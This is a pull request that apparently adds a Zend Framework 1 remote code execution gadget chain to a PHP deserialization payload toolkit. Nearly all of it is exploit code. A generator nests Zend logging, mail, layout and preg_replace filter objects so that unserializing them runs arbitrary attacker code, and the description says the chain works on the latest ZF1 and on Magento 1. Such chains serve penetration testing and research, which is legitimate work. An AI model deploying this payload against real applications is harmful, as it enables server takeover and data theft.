### PR TITLE
Add ZF1 RCE Gadget

### DIFF
--- a/gadgetchains/ZendFramework/RCE/1/chain.php
+++ b/gadgetchains/ZendFramework/RCE/1/chain.php
@@ -1,0 +1,32 @@
+<?php
+
+namespace GadgetChain\ZendFramework;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE
+{
+    public $version = '? <= 1.12.20';
+    public $vector = '__destruct';
+    public $author = 'mpchadwick';
+    public $informations = 'Uses preg_replace e modifier which has no effect in PHP >= 7.0.0';
+
+    public function generate(array $parameters)
+    {
+        $code = $parameters['code'];
+
+        return new \Zend_Log(
+            [new \Zend_Log_Writer_Mail(
+                [1],
+                [],
+                new \Zend_Mail,
+                new \Zend_Layout(
+                    new \Zend_Filter_PregReplace(
+                        "/(.*)/e",
+                        $code
+                    ),
+                    true,
+                    "layout"
+                )
+            )]
+        );
+    }
+}

--- a/gadgetchains/ZendFramework/RCE/1/gadgets.php
+++ b/gadgetchains/ZendFramework/RCE/1/gadgets.php
@@ -1,0 +1,67 @@
+<?php
+
+class Zend_Log
+{
+    protected $_writers;
+
+    function __construct($x)
+    {
+        $this->_writers = $x;
+    }
+}
+
+class Zend_Log_Writer_Mail
+{
+    protected $_eventsToMail;
+    protected $_layoutEventsToMail;
+    protected $_mail;
+    protected $_layout;
+    protected $_subjectPrependText;
+
+    public function __construct(
+        $eventsToMail,
+        $layoutEventsToMail,
+        $mail,
+        $layout
+    ) {
+        $this->_eventsToMail = $eventsToMail;
+        $this->_layoutEventsToMail = $layoutEventsToMail;
+        $this->_mail = $mail;
+        $this->_layout = $layout;
+        $this->_subjectPrependText = null;
+    }
+}
+
+class Zend_Mail
+{}
+
+class Zend_Layout
+{
+    protected $_inflector;
+    protected $_inflectorEnabled;
+    protected $_layout;
+
+    public function __construct(
+        $inflector,
+        $inflectorEnabled,
+        $layout
+    ) {
+        $this->_inflector = $inflector;
+        $this->_inflectorEnabled = $inflectorEnabled;
+        $this->_layout = $layout;
+    }
+}
+
+class Zend_Filter_PregReplace
+{
+    protected $_matchPattern;
+    protected $_replacement;
+
+    public function __construct(
+        $matchPattern,
+        $replacement
+    ) {
+        $this->_matchPattern = $matchPattern;
+        $this->_replacement = $replacement;
+    }
+}


### PR DESCRIPTION
Adds the gadget documented starting on page 41 here

https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf

I'm not sure exactly how far back this works in ZF1 versions, but works in the newest version. It also works in versions of Magento 1 that I've tested (which includes and autoloads the necessary ZF1 classes).